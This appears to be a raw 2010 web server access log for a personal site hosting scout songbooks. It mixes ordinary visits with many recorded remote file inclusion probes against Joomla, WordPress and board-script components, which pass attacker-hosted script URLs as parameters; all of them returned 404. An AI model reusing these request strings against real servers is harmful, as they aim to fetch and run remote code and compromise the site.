222.122.197.10 - - [01/Mar/2010:17:15:33 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:15:33 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:15:33 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:17:19:48 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
66.235.124.14 - - [01/Mar/2010:17:26:08 -0800] "GET /%7Edaveh/sean/song/pbsong2.html HTTP/1.1" 200 54080 /home/users/d/daveh/public_html/sean/song/pbsong2.html "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 1 www.accesscom.com
67.195.115.58 - - [01/Mar/2010:17:27:31 -0800] "GET /~daveh/sean/monty/monty.htm HTTP/1.0" 200 5477 /home/users/d/daveh/public_html/sean/monty/monty.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:28:20 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:28:20 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:28:20 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:23 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:23 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:23 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:25 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:25 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:17:28:25 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:29:16 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:29:16 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:29:16 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:30:14 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:30:15 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:30:15 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
118.129.166.221 - - [01/Mar/2010:17:31:39 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
118.129.166.221 - - [01/Mar/2010:17:31:43 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:33 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:33 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:34 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:46 -0800] "GET /~daveh/logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 365 /home/users/d/daveh/public_html/logs///administrator "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:46 -0800] "GET /~daveh/logs/access.log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 378 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
222.122.197.10 - - [01/Mar/2010:17:32:46 -0800] "GET /~daveh///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 360 /home/users/d/daveh/public_html/administrator "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:17:33:24 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
207.46.204.193 - - [01/Mar/2010:17:36:42 -0800] "GET /%7Edaveh/sean/song/pbsong2.html HTTP/1.1" 304 - /home/users/d/daveh/public_html/sean/song/pbsong2.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
66.206.227.212 - - [01/Mar/2010:17:40:33 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.bing.com/search?q=boy+scout+songs&form=QBRE&filt=all&qs=AS&pq=boy+scout+songs&sp=1&sc=1-15" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLivePatch.1.3; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveCo
66.206.227.212 - - [01/Mar/2010:17:40:33 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLivePatch.1.3; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4)" 0 www.accesscom.com
66.206.227.212 - - [01/Mar/2010:17:41:00 -0800] "GET /~daveh/sean/song/pbsong4.html HTTP/1.1" 200 59712 /home/users/d/daveh/public_html/sean/song/pbsong4.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.3; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLivePatch.1.3; .NET CLR 3.5.30729; .NET CLR 3.0.30729; OfficeLiveConnector.1.4)" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:28 -0800] "GET /~daveh//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/skauti "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:28 -0800] "GET /~daveh/logs//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 362 /home/users/d/daveh/public_html/logs//skauti "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:29 -0800] "GET /~daveh/logs/access.log%20%20//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 375 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:30 -0800] "GET /~daveh/logs//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 362 /home/users/d/daveh/public_html/logs//skauti "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:30 -0800] "GET /~daveh//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 357 /home/users/d/daveh/public_html/skauti "-" "Mozilla/5.0" 0 www.accesscom.com
64.15.152.132 - - [01/Mar/2010:17:43:31 -0800] "GET /~daveh/logs/access.log%20%20//skauti//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 375 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:31 -0800] "GET /~daveh//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 336 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:31 -0800] "GET /~daveh/logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 341 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:31 -0800] "GET /~daveh/logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:35 -0800] "GET /~daveh/logs/access.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 354 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:35 -0800] "GET /~daveh//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 336 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
74.81.82.218 - - [01/Mar/2010:17:43:35 -0800] "GET /~daveh/logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 341 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/5.0" 0 www.accesscom.com
166.205.9.196 - - [01/Mar/2010:17:52:04 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16" 0 www.accesscom.com
166.205.9.196 - - [01/Mar/2010:17:52:04 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.1" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Safari/528.16" 0 www.accesscom.com
166.205.9.196 - - [01/Mar/2010:17:52:04 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.1" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com/m/search?oe=UTF-8&client=safari&hl=en&q=boy+scout+cheers&resnum=0&ei=1m6MS4ihAqKItge-0IzcAQ&sa=X&oi=revisions_inline&ct=broad-revision&cd=1" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_1_3 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7E18 Sa
207.46.199.38 - - [01/Mar/2010:17:53:43 -0800] "GET /~daveh/logs/?D=A HTTP/1.1" 200 13282 /home/users/d/daveh/public_html/logs/ "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:09 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:09 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:09 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:10 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:10 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:10 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:45 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:45 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:45 -0800] "GET /~daveh/logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:55 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:55 -0800] "GET /~daveh/logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 342 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:03:55 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:05:21 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:05:21 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:05:21 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:06:40 -0800] "GET /~daveh//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 324 /home/users/d/daveh/public_html/bbs "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:06:40 -0800] "GET /~daveh/logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 340 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
81.92.215.78 - - [01/Mar/2010:18:06:40 -0800] "GET /~daveh/logs//bbs//skin/ggambo7002_board/write.php?dir=http://smkn-13bdg.sch.id/id1.txt?? HTTP/1.1" 404 329 /home/users/d/daveh/public_html/logs//bbs "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:18:12:09 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
207.46.204.191 - - [01/Mar/2010:18:13:14 -0800] "GET /~daveh/sean/song/index.html HTTP/1.1" 404 307 /home/users/d/daveh/public_html/sean/song/index.html "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 0 www.accesscom.com
98.150.43.67 - - [01/Mar/2010:18:19:38 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?source=ig&hl=en&rlz=1G1GGLQ_ENUS369&=&q=boy+scout+songs&aq=0&aqi=g10&oq=boy+scout+song" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0 www.accesscom.com
98.150.43.67 - - [01/Mar/2010:18:19:38 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 0 www.accesscom.com
70.113.30.209 - - [01/Mar/2010:18:20:21 -0800] "GET /~daveh/sean/song/pbsong0.html HTTP/1.1" 200 15827 /home/users/d/daveh/public_html/sean/song/pbsong0.html "http://www.google.com/search?hl=en&q=cub+scout+songbook&btnG=Search&aq=f&aqi=&aql=&oq=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MS-RTC EA 2)" 0 www.accesscom.com
70.113.30.209 - - [01/Mar/2010:18:20:22 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.1" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MS-RTC EA 2)" 0 www.accesscom.com
70.113.30.209 - - [01/Mar/2010:18:21:39 -0800] "GET /~daveh/sean/song/pbsong5.html HTTP/1.1" 200 13272 /home/users/d/daveh/public_html/sean/song/pbsong5.html "http://www.accesscom.com/~daveh/sean/song/pbsong0.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618; MS-RTC EA 2)" 0 www.accesscom.com
203.122.254.24 - - [01/Mar/2010:18:25:02 -0800] "GET /~daveh/sean/song/songskit.html HTTP/1.0" 200 51136 /home/users/d/daveh/public_html/sean/song/songskit.html "http://www.google.com.au/search?hl=en&lr=&rlz=1G1GGLQ_ENAU368&ei=0HaMS4j4Hc2IkAWNycEO&sa=X&oi=spellfullpage&resnum=0&ct=result&cd=2&ved=0CAYQvwUoAQ&&q=cheer+songs&spell=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" 1 www.accesscom.com
203.122.254.26 - - [01/Mar/2010:18:25:02 -0800] "GET /~daveh/sean/song/new.gif HTTP/1.0" 200 147 /home/users/d/daveh/public_html/sean/song/new.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" 0 www.accesscom.com
203.122.254.24 - - [01/Mar/2010:18:25:02 -0800] "GET /~daveh/sean/song/Updated.gif HTTP/1.0" 200 1226 /home/users/d/daveh/public_html/sean/song/Updated.gif "http://www.accesscom.com/~daveh/sean/song/songskit.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:18:25:55 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
216.119.103.16 - - [01/Mar/2010:18:29:25 -0800] "GET /~daveh//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 322 /home/users/d/daveh/public_html/components "-" "Mozilla/5.0" 0 www.accesscom.com
216.119.103.16 - - [01/Mar/2010:18:29:25 -0800] "GET /~daveh/logs//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 327 /home/users/d/daveh/public_html/logs//components "-" "Mozilla/5.0" 0 www.accesscom.com
216.119.103.16 - - [01/Mar/2010:18:29:25 -0800] "GET /~daveh/logs/access.log//components/com_toolbar/toolbar.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 338 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
77.240.113.151 - - [01/Mar/2010:18:35:23 -0800] "GET /~daveh/logs///index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://woojinmc.com/board/data/ts????? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs///index.php "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 0 www.accesscom.com
61.43.89.13 - - [01/Mar/2010:18:36:36 -0800] "GET /~daveh//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 298 /home/users/d/daveh/public_html/export.php "-" "Mozilla/5.0" 0 www.accesscom.com
61.43.89.13 - - [01/Mar/2010:18:36:36 -0800] "GET /~daveh/logs//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//export.php "-" "Mozilla/5.0" 0 www.accesscom.com
61.43.89.13 - - [01/Mar/2010:18:36:36 -0800] "GET /~daveh/logs/access.log//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 314 /home/users/d/daveh/public_html/logs/access.log "-" "Mozilla/5.0" 0 www.accesscom.com
61.43.89.13 - - [01/Mar/2010:18:36:55 -0800] "GET /~daveh/logs//export.php?mosConfig.absolute.path=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 303 /home/users/d/daveh/public_html/logs//export.php "-" "Mozilla/5.0" 0 www.accesscom.com
